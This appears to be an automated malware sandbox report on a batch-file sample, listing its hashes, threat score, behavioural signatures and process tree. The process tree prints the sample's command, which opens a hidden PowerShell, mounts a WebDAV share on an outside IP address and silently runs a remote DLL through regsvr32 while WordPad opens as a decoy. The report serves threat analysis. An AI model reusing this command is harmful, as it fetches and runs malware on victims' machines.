Analysis
-
max time kernel
101s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-07-2024 11:53
Static task
static1
Behavioral task
behavioral1
Sample
87532784455232533.bat
Resource
win7-20240704-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
87532784455232533.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
87532784455232533.bat
-
Size
9KB
-
MD5
d59333152802add9334b1f49f2dfffbb
-
SHA1
a8c4d45540fa95b17956429afcb9ce553232ad32
-
SHA256
ffc1d78ef7cb905b892d76e262bad722764e59e6a256aa1c3a866214db715e48
-
SHA512
fc43120634df8d43d3469895ae29e26d5452cfc5b2272afe9846f16dd09b3df35ad610f1870c35ab3a0441b399162fc5971a22bcc37c75c23cfbac7fa555428b
-
SSDEEP
192:XeUEQm/xbgBcOUCO1Lv9Q/rzwX+q9wD7zFEWhq781fA:OUEQegAD+KVi/eW+
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2752 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2796 wordpad.exe 2796 wordpad.exe 2796 wordpad.exe 2796 wordpad.exe 2796 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 708 wrote to memory of 2796 708 cmd.exe 30 PID 708 wrote to memory of 2796 708 cmd.exe 30 PID 708 wrote to memory of 2796 708 cmd.exe 30 PID 708 wrote to memory of 2752 708 cmd.exe 31 PID 708 wrote to memory of 2752 708 cmd.exe 31 PID 708 wrote to memory of 2752 708 cmd.exe 31 PID 2752 wrote to memory of 2780 2752 powershell.exe 33 PID 2752 wrote to memory of 2780 2752 powershell.exe 33 PID 2752 wrote to memory of 2780 2752 powershell.exe 33 PID 2752 wrote to memory of 2856 2752 powershell.exe 34 PID 2752 wrote to memory of 2856 2752 powershell.exe 34 PID 2752 wrote to memory of 2856 2752 powershell.exe 34 PID 2752 wrote to memory of 2856 2752 powershell.exe 34 PID 2752 wrote to memory of 2856 2752 powershell.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\87532784455232533.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\3130833887991.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2780
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\3130833887991.dll3⤵PID:2856
-
-